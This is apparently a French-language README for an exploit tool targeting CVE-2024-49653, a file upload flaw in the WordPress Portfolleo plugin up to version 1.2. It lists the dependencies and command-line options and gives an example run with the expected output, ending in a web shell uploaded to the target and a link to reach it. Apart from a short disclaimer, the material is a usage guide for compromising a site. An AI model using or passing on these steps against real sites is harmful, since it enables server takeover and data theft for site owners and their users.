
WordPress Portfolleo plugin <= 1.2 - Vulnérabilité de téléchargement de fichier arbitraire
Titre : Plugin WordPress Portfolleo <= 1.2 - Vulnérabilité de téléversement arbitraire de fichier
Description :
La vulnérabilité de téléversement sans restriction de fichier de type dangereux dans le plugin Portfolleo de James Eggers permet de téléverser un web shell sur un serveur web. Ce problème affecte Portfolleo de la version n/a jusqu'à la version 1.2.
En savoir plus :
Score CVSS :
Ce script exploite la vulnérabilité de téléversement arbitraire de fichier dans le plugin WordPress Portfolleo (versions <= 1.2) pour téléverser un web shell.
Vous devez avoir installé les éléments suivants pour exécuter le script :
requestsbeautifulsoup4Vous pouvez installer les bibliothèques requises avec :
pip install requests beautifulsoup4
Exécutez le script avec les options suivantes :
CVE-2024-49653.py [-h] -u URL -U USERNAME -p PASSWORD
Plugin WordPress Portfolleo <= 1.2 - Vulnérabilité de téléversement arbitraire de fichier # par Khaled Alenazi
options:
-h, --help Affiche ce message d'aide et quitte
-u, --url URL URL de base du site (ex. http://target/wordpress)
-U, --username USERNAME
Nom d'utilisateur WordPress
-p, --password PASSWORD
Mot de passe WordPress
python CVE-2024-49653.py -u http://target/wordpress.com -U Nxploited -p password123
Si le script s'exécute correctement, vous devriez voir la sortie suivante :
[+] Connexion réussie.
[+] _wpnonce extrait : e5f7ffa134
[+] Le shell a été téléversé.
[*] Vérifiez le shell ici : http://target.com/wp-content/portfolleo/nxploit.php
Ce script est destiné uniquement à des fins éducatives. L'auteur n'approuve pas l'utilisation de ce script pour des activités illégales. Utilisez-le de manière responsable et uniquement sur des systèmes pour lesquels vous avez l'autorisation explicite de tester.
Par : Nxploited | Khaled Alenazi